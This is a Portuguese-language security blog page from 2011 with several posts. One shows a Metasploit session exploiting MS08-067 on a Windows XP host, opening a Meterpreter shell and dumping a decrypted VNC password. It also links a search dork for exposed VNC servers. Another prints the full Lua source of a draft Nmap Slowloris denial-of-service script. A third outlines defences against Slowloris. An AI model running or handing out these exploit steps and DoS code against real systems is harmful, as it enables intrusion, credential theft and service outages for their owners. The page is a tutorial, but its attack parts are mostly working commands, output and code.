MSF Meterpreter: Quebrando senhas do VNC
21 de Março de 2011, 0:00 - sem comentários ainda<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo.png"><img class="alignleft size-medium wp-image-2337" title="metasploit-logo" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/metasploit-logo-300x197.png" height="197" alt="" width="300" /></a><br /> Recentemente <a href="http://carnal0wnage.blogspot.com/">Chris Gate</a> escreveu sobre o <a href="http://carnal0wnage.blogspot.com/2011/03/vnc-passwords-and-metasploit-and-des.html">getvncpw</a>, está feature do payload <a href="http://www.nologin.org/Downloads/Papers/meterpreter.pdf">MSF Meterpreter</a> quebra o algoritmo DES de senhas do *VNC. </p> <p>Rob Fuller aka mubix reescreveu o módulo adicionando várias funcionalidades e melhorias, como ele ainda não está integrado ao MSF poderá ser baixado <strong><a href="http://www.room362.com/scripts-and-programs/metasploit/enum_vnc_pw.rb">AQUI</a></strong></p> <p><strong><br /> Vamos aos testes<br /> </strong></p> <blockquote><p> msf exploit(ms08_067_netapi) > exploit</p> <p>[*] Started reverse handler on 11.11.11.11:4444<br /> [*] Automatically detecting the target…<br /> [*] Fingerprint: Windows XP – Service Pack 3 – lang:Portuguese – Brazilian<br /> [*] Selected Target: Windows XP SP3 Portuguese – Brazilian (NX)<br /> [*] Attempting to trigger the vulnerability…<br /> [*] Sending stage (749056 bytes) to 11.11.11.11<br /> [*] Meterpreter session 2 opened (11.11.11.12:4444 -> 11.11.11.11:1032) at Mon Mar 21 15:57:38 -0300 2011 </p></blockquote> <blockquote><p> meterpreter > background </p></blockquote> <blockquote><p> msf exploit(ms08_067_netapi) > use post/windows/gather/enum_vnc_pw </p></blockquote> <blockquote><p> msf post(enum_vnc_pw) > set SESSION 1</p> <p>SESSION => 1 </p></blockquote> <blockquote><p> msf post(enum_vnc_pw) > run</p> <p>[*] Enumerating VNC passwords on VITIMA<br /> [*] Checking UltraVNC…<br /> [*] Checking WinVNC3_HKLM…<br /> [*] Checking WinVNC3_HKCU…<br /> [*] Checking WinVNC3_HKLM_Default…<br /> [*] Checking WinVNC3_HKCU_Default…<br /> [*] Checking WinVNC_HKLM_Default…<br /> [*] Checking WinVNC_HKCU_Default…<br /> [*] Checking WinVNC4_HKLM…<br /> <strong>[+] WinVNC4_HKLM => 2101f4d191cf99ca => DcLabsgays on port: </strong> <== OLHE A SENHA AQUI ;-P<br /> [*] Checking WinVNC4_HKCU...<br /> [*] Checking RealVNC_HKLM...<br /> [*] Checking RealVNC_HKCU...<br /> [*] Checking TightVNC_HKLM...<br /> [*] Checking TightVNC_HKLM_Control_pass...<br /> [*] Post module execution completed<br /> msf post(enum_vnc_pw) > </p></blockquote> <p>Com certeza este é um excelente módulo. Cuidado com seus <a href="http://www.google.com/search?q=intitle%3A%E2%80%9DVNC+Desktop+%E2%80%9D+inurl%3A5800&#038;ie=utf-8&#038;oe=utf-8&#038;aq=t&#038;rls=org.mozilla:en-US:unofficial&#038;client=iceweasel-a#sclient=psy&#038;hl=en&#038;client=iceweasel-a&#038;rls=org.mozilla:en-US%3Aunofficial&#038;source=hp&#038;q=intitle:%E2%80%9DVNC+Desktop+%E2%80%9D+inurl%3A5800&#038;aq=f&#038;aqi=&#038;aql=&#038;oq=&#038;pbx=1&#038;bav=on.2,or.r_gc.r_pw.&#038;fp=cc7bc17b6abe96b2">VNCs</a> jejejejejeje!!!!!</p> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=2068&lang=pt-br" class="crp_title">Usando o Nessus plugin com o MySQL e o db_autopwn no Metasploit</a></li><li><a href="http://blog.alexos.com.br/?p=1119&lang=pt-br" class="crp_title">Quebre senhas online ( Updated )</a></li><li><a href="http://blog.alexos.com.br/?p=2180&lang=pt-br" class="crp_title">Nessus Viewer</a></li><li><a href="http://blog.alexos.com.br/?p=1996&lang=pt-br" class="crp_title">Brincando com o plugin do Nessus para o Metasploit</a></li><li><a href="http://blog.alexos.com.br/?p=18&lang=pt-br" class="crp_title">Mozilla Firefox iframe.contentWindow.focus Deleted Object Reference Vulnerability</a></li></ul></div>
Nmap: Script detecta servidores vulneráveis a ataques de DoS com o Slowloris
20 de Março de 2011, 0:00 - sem comentários ainda
O desenvolvimento de scripts para o Nmap anda a toda velocidade. Atendendo a pedidos na NSE Wiki o desenvolvedor Ange Gutek disponibilizou o draft de um script que detecta se o servidor está vulnerável a ataques de DoS usando o Slowloris.
De acordo com Gutek nesse momento o script fará o ataque sem saber se foi bem sucedido ou não, também não gera nenhuma saída e rodará para sempre. O monitoramento é feito através do modo debug (-d).
Sintaxe:
nmap –script http-slowloris –script-args [ARGUMENTOS] [ALVO]
Argumentos:
http-slowloris.threads – Número máximo de conexões concorrentes, se o alvo for Windows esse valor limita-se a 130.
http-slowloris.timeout – Tempo de espera antes de enviar novos dados httpheader. Padrão 100 segundos.
Gutek está convocando contribuidores para ajudar no aprimoramento do script.
Código:
description = [[
Tests a webserver against the Slowloris DoS attack, as it was described at Defcon 17 by RSnake
(see http://ha.ckers.org/slowloris/)This script opens and maintains numerous 'half-http' connections until the webserver runs out of ressources,
leading to a denial of service.
When the DoS condition is met the script then stops the attack and returns the payload datas as they could be usefull to tweak further filtering rules:
- Time taken until DoS
- Number of threads used
- Number of queries sent (or: amount of datas sent, in bytes)TODO
o Add a stopping mechanism
+ reserve a thread to monitor the webserver from time to time. If not responding, then stop.
o Analyze the threads: if the number of effective connections is lower than required by the script, maybe notify of a potential filtering rule ahead.
o Add user-supplied arguments:
+ threads, the max number of concurrent connections on the target: on Windows it seems to be limited to 130
+ timeout, time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds, but could be measured as slowloris.pl does]]
—
– @usage
– nmap –script http-slowloris –script-args http-slowloris.threads=500 http-slowloris.timeout=200
–
– @args http-slowloris.threads The max number of concurrent connections on the target: on Windows it seems to be limited to 130.
– @args http-slowloris.timeout Time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds.
–
– () output
– 80/tcp open http syn-ack
– | http-slowloris: Target was DoSed:
– | the attack took to succeed
– | with concurrent connections
– |_ with sentauthor = “Ange Gutek”
license = “Same as Nmap–See http://nmap.org/book/man-legal.html”
categories = {“dos”, “intrusive”}require “shortport”
require “stdnse”portrule = shortport.http
action = function(host, port)
math.randomseed(os.time())
local output,i
local threads = {}
nmap.registry.slowloris = {}
nmap.registry.slowloris['threads']=1— Threaded function ——————————————————————
local doHalfhttp = function(host,port)
local get_uri = math.random(100000, 900000) — we will query a random page
— create socket
local slowloris = nmap.new_socket()
local catch = function()
slowloris:close()
end
local try = nmap.new_try(catch)
try(slowloris:connect(host.ip, port))— Build a half-http header. Maybe the user-agent string should outline Nmap instead ?
local half_http = “GET /”..get_uri..” HTTP/1.1\r\n”
half_http = half_http..”Host: “..host.ip..”\r\n”
half_http = half_http..”User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n”
half_http = half_http..”Content-Length: 42\r\n”try(slowloris:send(half_http))
local count = nmap.registry.slowloris['threads'] — retrieve the number of already effective connectioncount = count + 1
nmap.registry.slowloris['threads']=count
stdnse.print_debug(1, “%s: USING %d THREADS)…”, SCRIPT_NAME, nmap.registry.slowloris['threads'])local queries = 2
while true do
— this is where we set the time to wait before maintaining the connection by sending a new line to the http header
— this value would be more efficient if it was just below the target timeout
stdnse.sleep(100)
try(slowloris:send(“X-a: b\r\n”))
queries = queries + 1
queries = queries * nmap.registry.slowloris['threads']
stdnse.print_debug(1, “%s: SENT %d QUERIES SO FAR (using %d threads)…”, SCRIPT_NAME, queries,nmap.registry.slowloris['threads'])
endend
— ————————————————————————————— Main
for i=1,1000 do — Number of threads to launch
local co = stdnse.new_thread(doHalfhttp, host, port)
threads[co] = true
end
return outputend
See:
Protegendo seu WebServer contra o Slowloris HTTP DoS
16 de Março de 2011, 0:00 - sem comentários ainda
O Slowloris é uma ferramenta de HTTP DoS desenvolvida pelo Rsnake. Seu funcionamento é bastante interessante porque ele cria sockets e envia requisições HTTPs válidas para a vitima continuamente em intervalos regulares, dessa forma ele tenta enganar o webserver evitando que estas conexões sejam fechadas.
Os webservers baseados em thread estão mais vulneráveis a este tipo de ataque por limitar a quantidades de threads por conexão. O Slowloris aguarda a conexão bem sucedida de todos os sockets para iniciar o ataque então se o alvo for um site muito acessado isso pode demorar um pouco.
Está técnica permite indisponibilizar o alvo aos poucos dificultando a detecção do ataque, se um usuário reiniciar uma conexão em curto espaço de tempo o acesso ao site alvo será estabelecido sem problemas. A ferramenta concorre com os acesso válidos nomalmente ganhando esta concorrência.
Seguem algumas soluções de proteção contra este tipo de ataque:
O active-responses do Ossec bloqueia a origem do ataque de forma automática sem a necessidade de configurações extras.
A utilização deste módulo é a solução dada por muitos sites.
A diretiva SecReadStateLimit é usada para limitar o número de threads concorrentes por IP.
See:
- Usando o http-wp-plugins do Nmap para detectar plugins do WordPress
- Infraestrutura para Aplicações Web Seguras parte 3 – Aplicação
- Servidores ssh sob ataque devido a falha no phpMyAdmin ( Atualizado )
- Instalando o Ossec-WUI ( Web Interface )
- Black Hat – Palestrante apresentará roteadores xDSL vulneráveis a ataque de DNS rebinding
Usando o http-wp-plugins do Nmap para detectar plugins do WordPress
15 de Março de 2011, 0:00 - sem comentários ainda
Foi anunciado recentemente um excelente Nessus Viewer
